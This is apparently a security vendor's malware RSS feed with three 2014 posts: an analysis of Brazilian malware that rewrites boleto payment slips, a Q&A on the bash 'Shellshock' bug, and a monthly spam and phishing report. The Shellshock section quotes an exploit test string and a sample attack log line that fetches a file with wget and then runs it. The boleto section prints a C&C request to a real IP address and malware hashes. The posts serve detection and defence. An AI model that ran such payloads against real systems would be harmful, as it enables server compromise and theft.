Malware RSS Feed

Attacks against Boletos

Malware Alerts - Fri, 09/26/2014 - 03:00
Introduction

José is a very suspicious person. He never uses internet banking services or buys anything using a credit card. Indeed, he doesn't even have one. He doesn't trust any of these modern technologies in the slightest. He's well aware of all the risks that exist online, so José prefers to keep his life offline.  However, not even that could save him from today's cybercriminals. He lost more than $2,000 in a single day: José was p0wned by a barcode and a piece of paper.

Brazilian crooks created a unique way of stealing money from these cautious, offline-only types: changing "boletos", popular banking documents issued by banks and all kind of businesses in Brazil. Boletos are actually one of the most popular ways to pay bills and buy goods in Brazil – even government institutions use them – and they are a unique feature of the Brazilian market.

In a series of online attacks targeting flaws on network devices – especially DSL modems – and involving malicious DNS servers, fake documents, browser code injections in the style of SpyEye, malicious browser extensions and a lot of creativity, the crooks have successfully stolen vast amounts of money, even from people who don't have credit cards or Internet banking accounts. It's a new worry for banks and financial institutions in the country.

This article explains how these attacks have happened in Brazil, and gives advice on protecting customers even when they have chosen to live offline.

Boleto bancário: the Brazilian payment system

Boletos are a very popular and easy way to pay bills or buy goods in Brazil today; even online stores will accept this kind of payment. All you need to do is print and pay it. According to the Brazilian Central Bank 21% of all payments in the country in 2011 were made using boletos.

Preferred payment methods in Brazil in 2011

According to e-bit 18% of all e-commerce transactions in Brazil in 2012 used boletos as the preferred payment method:

Preferred online payment method in Brazil in 2012

A boleto comes with an expiry date. Before that date it can be paid in at ATMs, branches and internet banking of any Bank, the Post Office, Lottery Agents and some supermarkets until its due date.  After the date it can only be paid at a branch of the issuing bank. The client also pays a fee levied by the bank; the fee increases with every passing day. Banks charge a handling fee for every boleto paid in by a customer. This fee varies from BRL 1,00 to BRL 12,00, depending on the bank. If the collection is registered then the bank will also charge a fee for every issued boleto, regardless of whether it was paid or not. Therefore, unregistered collections are more suitable for online transactions.

The bank also takes into account the size of the client, so a client with a higher volume of banking transactions, who has been working with the bank for a while, etc, is able to get lower fees or even fee exemption, which made the boleto a very important sales tool inside big companies, e-commerce and the government. If a company want to do business in Brazil, it essential to use boletos – Apple, Dell, Skype, Microsoft, DX.com, Alibaba.com, and even FIFA in the 2014 World Cup used it in local operations.

Buying Skype credits with boleto bancário as a payment method

This is the basic structure of a printed boleto bancário:

Boleto bancário for beginners according TheBrazilBusiness.com

  • Issuer Bank: the financial institution responsible for issuing and collection based on an agreement between itself and the merchant. The bank, once authorized to collect payment for the merchant, will credit the amount owed by the client in the merchant's bank account.
  • Identification Field: a numerical representation of the barcode, it contains all the information necessary to identify the merchant's bank account and clear the payment. This field is used in home and self-service banking.
  • Barcode: a code consisting of a group of printed and variously patterned bars (always 103mm in length and 13mm in height) and spaces and sometimes numerals that is designed to be scanned and read by a digital laser scanner and that contains information to identify the object it labels.

To pay a boleto at the bank or online all that is necessary is to scan the barcode – if it's unreadable (due to a bad print) users can type in the 44-number identification code instead. Some banks have a barcode scanner in their mobile apps, so mbanking users don't need to type the ID field; they can pay the boleto using their device's camera.

Paying a boleto using a barcode scanner

What could possibly go wrong? Well, how about changing the barcode or the ID field? It's simple and means payments can be redirected to another account. That's exactly what Brazilian fraudsters started to do – and the easiest and effective way was using malware.

The Brazilian boleto malware

A boleto can be generated and printed by the store that is selling its products to you, or even by users themselves during an online purchasing process. It's displayed in the browser, generally in HTML mode, using free libraries available for developers to implement in their ERP software or in their online store system.

BoletoPHP is a free resource for developers to generate boletos using PHP

The extensive documentation and legitimate open source software used to generate boletos helps malware creators to develop Trojans which are programmed to change boletos locally, as soon as they are generated by the computer or browser. These Trojans were spotted in the wild in April 2013 by LinhaDefensiva.com and are still being distributed in Brazil today. In fact most of the Brazilian criminals who use Trojan bankers to steal money are migrating their attacks to target boletos, using the same infrastructure.

The first generations chose to change the ID field number and the barcode:

A boleto modified by a Brazilian Trojan: the new ID number and barcode redirect the payment to the fraudster's account

Some versions of the malware use a JavaScript injection to change the content of the boleto:

"CodBarras" means barcode in Portuguese

Some later versions of this Trojan appeared and started to change only the numbers in the ID field:

"Linha Digitável" means typeable line in Portuguese; it's the ID field number

These new versions also used a span HTML element in order to add a white space to the barcode, making it unreadable. That forces the customer or bank staff to type the doctored 44-digit ID field to pay the boleto. So as not to raise suspicions, the Trojan does not change the value and due date for the transaction:

HTML page changed by the Trojan, adding a white space to invalidate the barcode, source LinhaDefensiva.org

The ID field includes a lot of information, detailing the bank account that will receive the payment and other data used according to the rules established by each bank. The "Nosso Número" data ("Our ID Number") is a unique identifier, different for each boleto. Changing the ID number is enough to redirect the payment to another bank account.

Understanding the ID field on boletos

Since most boletos are now generated in a browser, the Trojan targeting Internet Explorer users installs a BHO ready to communicate with a C&C and monitor traffic, looking for words such as "boleto" and "pagamento" (payment), choosing the right moment to inject the code and replacing the ID number stored in HTML with a new one, downloaded from the C&C.

It's like SpyEye: code injection in the browser's section

Initially most of these BHO had a very low detection rate, incorrectly flagged as Trojan banker by normal antimalware products (e.g the MD5s 23d418f0c23dc877df3f08f26f255bb5 and f089bf60aac48e24cd019edb4360d30d). One example of a request made by these BHOs and a response with a new ID number to be injected:

Request: http://141.105.65.5/11111.11111%2011111.111111%2011111.111111%201%201111111111
Response: 03399.62086 86000.000009 00008.601049 7 00000000000000

Compromised websites may also host scripts that generate the new ID number for these boletos:

Or something design to inject not only a new ID number but a new barcode as well:

We also found very professional control panels used by the fraudsters to collect data from infected machines and register every boleto as soon as it is generated. It's the same infrastructure used in the development of Trojan bankers, as a fraudulent boleto is a new way to steal money from the users.

A bad guy's control panel to control infected machines

Some of the panels offer a lot of details to the crooks, such as the date/hour the boleto was generated/changed, the old ID field and the replacement injected by the malware, the value and the origin – where the boleto was generated, if it was local or on a website.

Another boleto malware panel

Right now it's really easy to find places where wannabe cybercriminals can buy this toolkit and start their own attacks on boletos. A starter pack costs about R$ 500.00 (around US$ 250)

"Only for connoisseurs", the boleto kit malware + panel for sale on Facebook

The Zeus link – encrypted payloads

The boleto malware campaigns combined several new tricks to infect and steal from more users. One of the most recent is the use of non-executable and encrypted malware payloads XORed with a 32-bit key and compressed by ZLIB, using the extensions .BCK, .JMP, .MOD and others.

Encrypted .JMP file downloaded by the boleto malware

It's no coincidence that the same technique was used by the ZeuS GameOver gang. We have evidence of Brazilian criminals cooperating with western European gangs involved with ZeuS and its variants; it's not unusual to find them on underground forums looking for samples, buying new crimeware and ATM/PoS malware. The first results of this cooperation can be seen in the development of new attacks such the one targeting payments of boletos in Brazil.

Using encrypted payloads offers the criminals an effective way to bypass any firewalls, webfilters, network intrusion detection systems or other defenses that may be in place, as a tiny Trojan downloads these encrypted files and decrypts them to complete the infection.

Decrypted .JMP file: a normal PE executable

Intercepting SSL conections

Another interesting approach seen in boleto malware is the role of Fiddler, a web debugging proxy tool normally used by malware researchers. Some boleto malware uses it to intercept SSL traffic or to do a MitM, aiming to change boletos generated even in HTTPS pages.

We found this behavior in samples such as Trojan.Win32.Badur.imwt:

Boleto Trojan programmed to use Fiddler: MitM in SSL pages

The malware installs SSL certs from FiddlerCore on the infected machine and captures the traffic of HTTPS pages.

Certificate of Fiddler installed by the malware

Attacks against network devices

Investigating the attack vector used by the fraudsters and looking at how the victims got infected we found that all possible techniques are used. Social engineering attacks via well designed e-mail campaigns are the most widespread, but the most aggressive path includes the massive use of RCE on vulnerable DSL modems – in 2011/12 more than 4 million of these devices were attacked in Brazil and had their DNS settings changed by cybercriminals – the same approach is still being used to distribute this malware today.

When an affected user tries to visit popular websites or Brazilian web portals the malicious DNS configured in the DSL modem offers to install a new Flash Player. In reality, accepting this installation will infect the machine with boleto malware.

Is Google.com hosting a Flash Player installer? Nope, it's the malicious DNS in the DSL modem

Another recent move from Brazilian criminals was to spread web-based attacks against home-routers in an attempt to change the DNS of the device. These attacks were called "drive-by-pharming". It can be spread via malicious domains or by compromising popular websites:

News website "Estadão" compromised: the malicious script asks the password of your home router

The malicious script tries to guess the password of your home router. If it succeeds a new DNS server will be configured in the device and the criminals will control all your traffic. If it fails the compromised site will display a box asking for your credentials.

Is the password of your router gvt12345? Just guessing…

Recently we identified more than 30 malicious DNS servers being used in these attacks in Brazil. What does the new DNS server do? It redirects users' connections, serving phishing pages or even fake banking pages that modify every boleto the user generates.

If criminals combine web-based attacks with advertisements they can reach millions of people. This tactic is already being used:

What's the fastest way to attack home routers in Brazil? Using advertising

If the criminals can't compromise your network device, they'll target the ISP. We have already seen a series of DNS poisoning attacks against Net Virtua, one of the biggest Brazilian ISPs. Every time the aim is the same, targeting boletos.

But there was worse to come when cybercriminals decided to move to a more online approach…

Fake websites, fake extensions, fraudulent boletos

Some fraudsters decided that spreading their Trojans wasn't enough. They wanted faster returns and changed their tactics. They looked online, investing in sponsored links, fake websites that claimed to recalculate expired boletos (this is possible with this payment system) and malicious browser extensions for Google Chrome or Firefox.

Malicious Chrome extensions, in the official Store

One attack started with a message promising 100 minutes free Skype credit:

Skype-To-Go free for Chrome users! It's easy, just install an extension…

Why distribute a Trojan when you can trick users into installing a malicious browser extension that controls and monitors all the traffic? That's exactly what the fraudsters did, with the valuable help of the official Google Chrome Web Store, where the malicious extension was hosted:

Trojan-Banker.JS.Banker.bv

And this wasn't the only one, we found more:

Trojan-Banker.JS.BanExt.a, found on June 2014 in the Store, almost 2,000 users installed it

And one more, disguised as financial app that generates (fake) boletos:

Trojan-Banker.JS.Banker.bx, more than 3,800 installations…

The extension was prepared to just like a BHO on an infected machine: monitor and wait for the moment a boleto is generated, and then communicate with a C&C…

Trojan-Banker.JS.Banker.bw

…and receive a new ID field number, injecting it in the boleto while invalidating the barcode:

To disguise any intent to discover the real purpose of the extension there was some obfuscation of the main .JS file inside the .CRX file:

HEXed JavaScript file

After removing the obfuscation we can see the websites it's targeting:

The list includes big Brazilian backs and well-known online stores such as Americanas.com and PagSeguro (a service similar to Paypal). Customers of small banks did not escape from the attack – malicious extensions are set up to target a long list of local banks:

The huge number of malicious extensions prompted Google's decision at the end of May 2014 to limit the installation of Chrome extensions. Now they can only be hosted on the Chrome Web Store, but it is no problem for cybercriminals to put their malicious creations there.

Forcing the developer mode on Google Chrome

One example is Trojan-Banker.Win32.ClearWind.a. Its main target is to install a malicious extension that changes boletos, activating the developer mode on Google Chrome and forcing the installation of any extension, even those not hosted in the official store:

"Developer mode" activated on Chrome. The malware did it

These Trojans were able to infect a lot of people, installing the malicious extension to change boletos:

Trojan-Banker.Win32.ClearWind.a, more than 8,000 installations

Malicious Firefox add-on

But if you use Firefox, you're still at risk; there is a version of a malicious add-on for these users as well:

For bad guys' convenience, the malicious Firefox add-on is hosted on Google Storage:

Trojan-Banker.JS.Banker.cd ready to install a malicious addon to change your boletos

Sponsored links, fake websites

Other interesting characteristic of boletos is that you can generate a counterpart copy, in case you lose the original one. Some banks also offer a service to customers who missed the payment deadline and need to recalculate the value of an expired boleto and reissue it, after paying a small fee. All companies working with boletos offer these services to their customers, generally online, and cybercriminals can attack here as well.

The fraudsters decided to set up malicious websites that claim to offer re-issues or recalculations of expired boletos – but of course the new boleto is totally fake and redirects the payment to the criminals' account. These attacks are carried out with the help of search engines, buying up sponsored link campaigns and putting their fraudulent sites to the top of the results.

In a search for "calcular boleto vencido" (recalculate expired boleto) or "segunda via boleto" (counterpart copy) on Google, the first result is a fraudulent service:

Google isn't the only one – it's the same on Yahoo:

And Ask.com:

Not forgetting Bing:

The fake websites that supposedly offer these services have a very professional design to help trick their victims.

All you need to do is choose the bank that issued the boleto, type in the data and "reissue" it.

Of course the boleto generated has the exact same value and due date you asked for, but the ID field number has new data…

"Your new boleto was generated and registered. Pay it today"

It's not just malware: the boleto gangs are using all the possible ways of tricking users and stealing their money. A very widespread attack such this one resulted in many victims.

Online and offline victims

These attacks were especially notorious for their "crossover" to the offline world, stealing from people who do not use internet banking or buy things online. It can even steal from people who have never connected to the Internet in their lives. Several infected computers in thousands of stores all over the country started to generate fraudulent boletos for their customers. Once printed and paid they sent the money directly to the cybercriminals' accounts.

This sparked a real avalanche of Trojans using the same technique, and several businesses were badly affected. Many companies, the association of shopkeepers and the Brazilian government all issued alerts to their customers about the fraudulent boletos issued by these trojans (e.g. 1, 2, 3, 4). A lot of money was stolen and even now this fraud is costing banks, stores and customers dear.

Some cases draw our attention such this one of a businesswoman from Campo Grande – her company lost BRL 183,000 (around US$80,000):

That sum was stolen in just 3 days…

The Police Department in the state of Minas Gerais issued an alert to residents, warning that fraudsters had already stolen around BRL 25,000 (US$ 10,000) from businesses:

The police registered 12 cases in the state

To measure the problem we did the sinkhole of a C&C and found several victims – in only one malicious server the logs registered more than 612,000 requests in 3 days. Each one sought a fraudulent ID field to be injected into boletos generated on the infected machines:

Requests to a sinkholed C&C

Looking at these values led us to ask: how much money was stolen? How many victims? It's not easy to get this number if you do not thoroughly understand the Brazilian cybercrime environment.

8 billion?

In July 2014 several media outlets covered some RSA research about a "Cybercrime Scheme Uncovered in Brazil" – those attacks against boletos. Right from the start it offers a shocking figure: possibly as much as US$3.75 billion stolen, BRL 8.6 billion. In other words, it would have been the largest cybercrime heist known to date. To compare how big this number is, Banco do Brasil, the biggest bank in the country, makes US$ 6.6 billion in annual profits. So the bad guys stole half of the money from a big bank? Not so fast…

RSA found 495,793 boletos and 192,227 victims in their investigation. Once inside the control panel, they found the values of all payments that the virus had redirected. Added together, those payments topped the US$3.75 billion mark. This figure, however, includes everything – payments not made and payments that were made but not authorized by the bank (as the fraud was detected).  It also includes any test payments made by other researchers trying to understand the malware behavior or even tests made by the bad guy, or even duplicated entries as some customers tried to generate the same boleto several times.

A C&C displaying testing and duplicated entries

Counting every entry in a C&C resulted in this absurd number of R$ 8 billion, which averages at R$ 16,000 for each boleto. This value is unreal and incorrect — most boletos are worth far less. They also estimated a number of victims at 192,227. They did this by counting unique IP address, which is very unreliable. As in other parts of the world, most connections in Brazil use dynamic IP addresses. Other errors in the RSA report were highlighted by the LinhaDefensiva community in this article.

So how much was really stolen with fraudulent boletos? In reality only the banks can suggest a final total. The Brazilian Federation of Banks (FEBRABAN) publishes the combined losses faced by all banks due to electronic fraud each year. The year with the most losses so far was 2011. That year, they lost R$ 1.5 billion, or US$ 680 million.

One thing is certain: Brazilian cybercriminals are moving fast, adopting new techniques to continue attacking and stealing money from boletos. They would not waste their time if the scam was not profitable for them.

How to protect you and your company

This is a common question from users and businesses in Brazil working with boletos. Is it possible using this payment method securely?

FEBRABAN, the Brazilian Federation of Banks, suggests using DDA (Debito Direto Autorizado, Authorized Direct Debit). This replaces a printed boleto with an electronic bill, automatically withdrawing funds from another person's bank account after both parties pre-authorize the deal.

However some Brazilian companies are concerned by the higher costs associated with DDA. In this case we advise issuing boletos in a PDF format generated on the server-side, instead of using HTML format. At present no Trojan can modify a PDF boleto.

Boleto generated in PDF format: more secure than HTML

Kaspersky Lab customers are protected against these attacks – the Safe Money technology presented in our products can block it entirely by offering the option of opening pages in a safe mode where no malicious code could inject data. This ensures that boletos can be generated securely:

Kaspersky Fraud Prevention platform also stops Trojans designed to capture HTTPS traffic using Fiddler. KFP compares this fake certificate of Fiddler with the real certificate used by the Bank or payment service and then blocks access.

Kaspersky Fraud Prevention in action, blocking an unreliable SSL connection

Conclusions

Today these attacks are a big headache for everyone involved in buying and selling in Brazil – banks, businesses and customers alike. When a customer is hit with a fake boleto he says it's not his fault because he paid. The stores blame the bank for failing to process the payment properly. The bank insists it is only responsible for processing the boleto, not for the content of the paperwork. The buck goes round and round …

To complete the scenario Brazilian criminals specialize in identity theft. They often open banking accounts in the name of innocent people who know nothing of the situation, using stolen personal data. With money mules and accounts opened in the name of dead people; it's easy to see why it's so difficult to track stolen money.

Boletos are a very local and distinctive payment method; most other countries don't have anything similar and don't even know what a boleto is. Unfortunately security companies pay little attention to Brazil and miss a lot of issues that only local intelligence can detect and offer expertise. Local criminals are strictly limiting their attacks to Brazilian IPs and only install their Trojans on machines operating in Brazilian Portuguese.

Brazilian cybercriminals are following the same path as their counterparts in Russia and China, with a very specialized cybercrime scene where attacks on locals require special effort to understand properly. They are also sharing knowledge with cybercriminals from Eastern Europe, exporting new techniques such this one described here, clearly inspired by SpyEye, to do code injection.

"Bash" (CVE-2014-6271) vulnerability – Q&A

Malware Alerts - Thu, 09/25/2014 - 10:45
What is the "bash" vulnerability?

The "bash" vulnerability, actually described as CVE-2014-6271, is an extremely powerful vulnerability due to its high impact and the ease with which it can be exploited. An attacker can simply execute system level commands, with the same privileges as the affected services.

In most of the examples on the Internet right now, attackers are remotely attacking web servers hosting CGI scripts that have been written in bash.

At the time of writing, the vulnerability has already been used for malicious intentions – infecting vulnerable web servers with malware, and also in hacker attacks. Our researchers are constantly gathering new samples and indications of infections based on this vulnerability; and more information about this malware will be published soon.

The key thing to understand is that the vulnerability is not bound to a specific service, for example Apache or nginx. Rather, the vulnerability lies in the bash shell interpreter and allows an attacker to append system level commands to the bash environment variables.

How does it work?

I will use the same examples that we have seen in the advisories and proof-of-concept code that have been published,to explain how it works. When you have a CGI script on a web server, this script automatically reads certain environment variables, for example your IP address, your browser version, and information about the local system.

But just imagine that you could not only pass this normal system information to the CGI script, but could also tell the script to execute system level commands. This would mean that – without having any credentials to the webserver – as soon as you access the CGI script it would read your environment variables; and if these environment variables contain the exploit string, the script would also execute the command that you have specified.

What makes it unique?

This vulnerability is unique, because it's extremely easy to exploit and the impact is incredible severe – not least because of the amount of vulnerable targets. This does not just affect web servers, it affects any software which uses the bash interpreter and reads data which you can control.

Researchers are also trying to figure out if other interpreters, such as PHP, JSP, Python or Perl, are also affected.  Ddepending on how code is written, sometimes an interpreter actually uses bash to execute certain functions; and if this is the case, it might be that other interpreters could also be used to exploit the CVE-2014-6271 vulnerability.

The impact is incredibly high because there are a lot of embedded devices that use CGI scripts – for example routers, home appliances and wireless access points.  They are also vulnerable and, in many cases, difficult to patch.

How widespread is it?

This is very difficult to say, but we know from our intelligence systems that people started to develop exploits and worms directly after the vulnerability information was published – both whitehat and blackhat researchers are scanning the Internet for vulnerable servers.

It is too early to know how widespread this is, but I know from my own research that there are a great many web servers running CGI scripts, and I am pretty sure that we will also see a lot of other types of exploits being developed that target local files and network daemons. There have been discussions regarding both OpenSSH and dhcp-clients being vulnerable to this attack as well.

How do I check if my system/web site has been affected?

The easiest way to check if your system is vulnerable is to open a bash-shell on your system and execute the following command:

"env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If the shell returns the string "vulnerable", you should update your system.

Also there are tools for the technical audience out there that can be used to verify if your server is affected by this vulnerability.

Advice on how to fix this problem

The first thing that you need to do is to update your bash version.  Different Linux distributions are offering patches for this vulnerability; and although not all patches have been proven to be really effective yet, patching is the first thing to do.

If you are using any IDS/IPS I would also recommend that you add/load a signature for this.  Alot of public rules have been published.

Also review your webserver configuration.  If there are any CGI scripts that you are not using, consider disabling them

Is there threat to online banking?

This vulnerability is being actively exploited to target servers hosted on the Internet. Even some workstations running Linux and OSX are vulnerable, but an attacker would still need to find an attack vector that will work remotely against your desktop.

The vulnerability is not targeting individuals, but servers hosted on the Internet.  This means that if, for example, your favorite e-commerce or banking website were vulnerable, the attackers could, in theory, compromise that server and gain access to your personal information, including maybe banking information.

At the time of writing its very difficult to say exactly what platforms might be vulnerable and might have been targeted, but I would recommend that you do not actively use your credit card or share a lot of sensitive information for the next couple of days, until security researchers have been able to find out more information about this situation.

Can I detect if someone has exploited this against me?

We would recommend reviewing your HTTP logs and check if there is anything suspicious. An example of a malicious pattern:

192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"

There are also some patches for bash that log every command that is being passed to the bash interpreter. This is a good way to see if someone has exploited your machine. It won't prevent someone from exploiting this vulnerability, but it will log the attackers actions on the system.

How serious is the threat?

This bug is very dangerous indeed, but not EVERY system is vulnerable. Special conditions must be met, for example, for a web server to be exploited. One of the biggest problems now is that when patches are published, researchers look for other ways to exploit bash, explore different conditions that allow it to be exploited, etc. So a patch that helps to prevent remote code execution can't do anything against, for example, a file overwrite. So there will probably be a series of patches and in the meantime systems are still vulnerable.

Is it new Heartbleed?

Well, it's much easier for a cybercriminal to exploit than Heartbleed. Also, in the case of Heartbleed, a cybercriminal could only steal data from memory, hoping to find something interesting.  By contrast, the bash vulnerability makes full system control much more possible. So it would seem to be more dangerous.

Can it be used in future APTs?

It could be used for future malware development, of course. Malware could be used to automatically test infrastructure for such a bug, to infect the system or attack it in some other way.

Spam in August 2014

Malware Alerts - Thu, 09/25/2014 - 07:00
Spam in the spotlight

In August, fraudulent emails exploited global political events and the names of famous people in the Russian Federation. Malicious files were spread via email, including ones that imitated court summons. Spammers who earn money by advertising medications used popular services to attract the attention of recipients. Spammers also actively advertised travel services and collection agencies.

Malicious court summons

In August we registered several mass mailings imitating court summons in various languages. The English-language version informed that the user was being taken to court and should study the case materials to help lodge a defense. Those materials were supposedly in an attachment, which actually contained the Trojan Backdoor.Win32.Kuluoz capable of downloading and running other malware on the victim computer. By comparing several emails from a single mass mailing we confirmed that some details, such as the time, date and venue of the hearing and the names of the archives of malicious files varied from email to email. The sender addresses had been generated from a single template in which the scammers simply entered the words from a pre-determined list. The changes in the text to were intended to provide more individuality and bypass spam filtering.

As well as the English-language versions, similar malicious spam appeared in Russian and Czech. The scammers tried to convince users that they had unpaid debts due within 15 days. If they didn't pay, recipients were warned that their property could be confiscated and their bank accounts frozen.The attached archive contained Trojan-Downloader.Win32.Agent.heva, a malicious file presented by the fraudsters as financial and legal documents. Once the user ran the Trojan, an RTF file was displayed while the malicious program was downloading and installing Trojan.Win32.Tinba.ei, yet another Trojan designed to steal financial information such as bank account credentials and credit card data. The name of the Trojan is an acronym of 'Tinybanker'. This is a small piece of assembler code, but it has the functionalities of many larger pieces of similar malware.

Politics in "Nigerian" spam

In August, we again came across "Nigerian letters" exploiting the events in Ukraine. In the email written in English the scammers used the name of the former President of Ukraine Viktor Yanukovych to sell their story. This time the popular "Nigerian" trick of asking for help in investing money for a substantial reward came from a former financial adviser to the President, whose money had been secretly transferred to the adviser's personal account in London.

After a long silence the name of Mikhail Khodorkovsky was back again. We came across "Nigerian letters" supposedly written on behalf of his inner circle. To trick readers, the fraudsters spun the standard story offering a reward for assistance in transferring and investing huge sums of money. To make the email look more realistic, the body of the message contained the links to official articles about Khodorkovsky. In addition, it was emphasized that all future transactions were legal and did not present any risk to the victim.

One email provides minimal information, simply asking recipients to contact the scammers if they finds the offer interesting. Another email provides details of a tempting offer and stories from Khodorkovsky's life: before the arrest he couldn't withdraw all money out of Russia and now, after the release, he intends to complete the transfer. However as the disgraced billionaire cannot use his former company to do this, he is looking for someone to help him. Interestingly, "Nigerian" scammers enable recipients to unsubscribe from their mailing list by sending an email to the link at the end of the message. This is how the fraudsters collect a database of active e-mail addresses for the future spam mass mailings.

Medication adverts in fake Google Play emails

Spam messages advertising medications regularly offer pills to lose weight, enhance potency or improve the male sex drive. The body of these emails includes a short text with a link to a website of a store where the advertised product can be bought. Sometimes there is just a link. To send out "pharmaceutical" adverts, the fraudsters often use visual spam. However we sometimes see quite unusual tricks to advertise meds. For example, last autumn we wrote in our blog about a series of mailings which used the names of well-known companies and looked just like typical phishing messages. In August 2014, we noted another similar mass mailing.

This time the phishing email looked like a purchase notification from the Google Play app store. To convince the recipient that the email was genuine, the spammers utilized a realistic-looking sender address as well as the store's official logo. Links in the body text of the email, which often lead to pages on the real website, were inactive this time, even though they were highlighted. It seems that the scammers did not think their fake notifications would get through the spam filters so they made their emails look like classic phishing emails.

Spammers' Indian summer

The English-language segment of the Internet saw spam mass mailings offering special offer tours to Hawaii or Costa Rica or tropical forests, as well as the chance to book a private jet for business or pleasure. These messages came from various addresses and contained the links to newly created sites where users could compare the prices and select the most attractive offer.

We also noted mailings offering to participate in earn-online programs. These so-called binary options, offering quick and easy income to cover all the costs of the vacation advertised elsewhere.

How (not) to repay a loan

Another common theme in August's spam was debt managements for individuals and companies. Spammers send out colorful messages urging things like "Only pay what you can afford" and promised to wipe out crippling debts. The hyperlink in the email led to a newly created blank site with a name like "Zero-debt-now" with offers of consolidated loans (i.e. to get one credit for paying several others) or favorable credit terms.

Various collection and private lawyers, meanwhile, offer the opposite: specialized services to collect unpaid debts without slow and costly court proceedings. The advertising emails provided a brief description of the activities of the organization, the details of its work, a few statistics (number of collected loans, the number of satisfied customers, etc.) and included a contact phone number. The digits in the telephone numbers were often deliberately distorted or noised to bypass spam filters. The authors of the messages promised a successful outcome even in cases where other specialized services already have failed.

Statistics The percentage of spam in email traffic

Percentage of spam in email traffic

The percentage of spam in August's email traffic averaged 67.2%, which is only 0.2 percentage points up from July. The amount of unsolicited email increased throughout the month – in early August the percentage of spam averaged 64.9% while in the end it reached 70.4%.

Sources of spam by country

In August, the USA remained the most popular source of spam (15,9%), up 0.7 percentage points from the previous month. Russia was in second place with 6%; up 0.4 percentage points. China was in third place with 4.7% having produced 0.6 pp less spam than in July.

Sources of spam around the world

Vietnam was in 4th position with 4.7% of all distributed spam; its contribution grew by 1.2 pp which pushed this country up four places in the rankings. It is followed by Argentina (4.4%) which saw little change in its numbers and dropped one place in the table.

Germany (3.6%) remained in 6th place with a slight decrease in the percentage of distributed spam. Ukraine dropped to 8th. Meanwhile, Brazil (2.9%) added 0.5 pp to its previous month's contribution and placed 9th in August's Top 10, which was rounded up with India (2.8%).

Of note is the slight growth of spammer activity in South Korea (1.9%) which also entered the Top 20 in August.

Malicious attachments in email

The graphic below shows the Top 10 malicious programs spread by email in August.

The Top 10 malicious programs spread by email

In August Trojan.JS.Redirector.adf topped the rating of malicious programs most often spread via email. Its name speaks for itself: it is an HTML page containing code that redirects users to a scammer site offering downloads of Binbot, a popular service for automatic online sales of binary options. This malicious program is distributed via email in a ZIP archive which is not password-protected.

Trojan-Downloader.Win32.Upatre.to and Trojan-Downloader.Win32.Upatre.tq were in 3rd and 6th places. These malicious programs are relatively simple, are no more than around 3.5 Kb in size and usually download a Trojan banker from the family known as Dyre/Dyzap/Dyreza. The list of financial organizations targeted by this banker depends on the configuration of the file which is uploaded from the command center.

Trojan-Banker.Win32.Fibbit.rq was fourth. This banking Trojan embeds in Java applications for online banking targeting authentication data and other information, such as keys, transaction replacements and their results.

Backdoor.Win32.Androm.enji and Backdoor.Win32.Androm.erom were fifth and ninth in the ranking. Both malicious programs belong to Andromeda – Gamarue, a universal modular bot with features including downloading, storing and running executable files, downloading DLL (without saving on the disk) and plugins as well as the possibility of self-updating and self-deleting. The functionality of the bot can be expanded using a system of plugins that are loaded by the criminals as required.

Trojan.Win32.Bublik.clhs and Trojan.Win32.Bublik.bwbx, modifications of the notorious Bublik malware, ended in 7th and 8th positions in August. The Bublik malware family is mostly used for the unauthorized download and installation of new versions of malware onto victim computers.

Trojan-Spy.Win32.LssLogger.bos rounded off the Top 10. It is a multifunctional malicious program which is capable of stealing passwords from a wide range of software. All stolen information is then passed to the fraudsters via email.

Distribution of email antivirus detections by country

In August, the UK took the lead with 13.16% of all antivirus detections (+6.26 percentage points).  Germany (9.58%, -1.49 percentage points) and the USA (7.69%, -1.59 percentage points) were 2nd and 3rd respectively.

The most unexpected result arrived from Russia: its share grew by 3.33 pp from July and accounted for 6.73% which moved this country from 8th to 4th position in the ranking.

Italy (3.31%) dropped from 5th to 8th place having lost 1.33 percentage points. Hong Kong outran Australia, Turkey and Vietnam with 2.74% of all antivirus detections (+0.28 percentage points).

Special features of malicious spam

In August, the scammers again used fake notifications from Facebook to distribute malicious attachments. This time, users received a message from an unknown address warning them about the possible deactivation of their accounts. According to the text, over the last few days (and in some emails - months) the social network was attacked by hackers. To avoid any problems, the developers asked the users to install the utility attached to the email.

Each email contained a password-protected ZIP archive with an executable file and a unique password needed to unpack it. The attached archive bore the name of the user who the email was addressed (his email account login) and the same name was used to generate a password for the archive. At the end of the email the scammers said that the file could be only opened on a PC running under Microsoft OS. The utility in the archive was in fact a Trojan downloader, a representative of the Trojan-Downloader.Win32.Haze family. This malware downloads other malicious software usually developed to steal the owner's personal data or to send out infected emails to the address on his lists of contacts.

Phishing

In August 2014, Kaspersky Lab's anti-phishing component registered 32,653,772 detections which is 12,495,895 detections more than in the previous month. This considerable growth was probably caused by the summer slowdown in the demand for advertising spam. Fraudsters who do not want to lose their earnings switch to mass phishing mailings.

Australia topped the rating of countries most often attacked by phishers: during the month the number of Anti-Phishing component activations on computers of Australian users doubled and accounted for 24.4%. Brazil was 2nd with 19.5% of attacked users. It was followed by the UK (15.2%), Canada (14.6%) and India (14.5%).

The geography of phishing attacks*, August 2014

* The percentage of users on whose computers the Anti-Phishing component was activated, from the total number of all Kaspersky Lab users

Top 10 countries by the percentage of attacked users:

  Country % of users 1 Australia 24.4 2 Brazil 19.5 3 UK 15.2 4 Canada 14.6 5 India 14.5 6 UAE 14.1 7 Ecuador 13.1 8 Dominican Republic 13.0 9 Austria 12.8 10 China 12.7 Targets of attacks by organization

The statistics on phishing targets are based on detections made by Kaspersky Lab's anti-phishing component. It is activated every time a user enters a phishing page that has not previously been included in Kaspersky Lab databases. It does not matter how the user enters this page – by clicking the link contained in a phishing email or in the message in a social network or, for example, as a result of malware activity. After the activation of the security system, the user sees a banner in the browser warning of a potential threat.

In August, there was little change among the organizations most often attacked by phishers. Global Internet Portals remained the leading category with 30.8%; its share increased by 1.3 pp. Social networks came second with 17.3%, a 3.3 pp decline from the previous month. These two categories accounted for more than half of all phishing attacks in August.

Organizations most frequently targeted by phishers, by category – August 2014

Financial phishing accounted for 35.2% of all attacks, a 6.6 pp drop compared with the previous month. The percentage of detections affecting Banks, Online stores and E-payment systems went down 4.9, 1.2 and 0.6 pp respectively.

Top 3 organizations most frequently targeted by phishers   Organization % detections 1 Google 12.61% 2 Facebook 10.05% 3 Yahoo! 6.38%

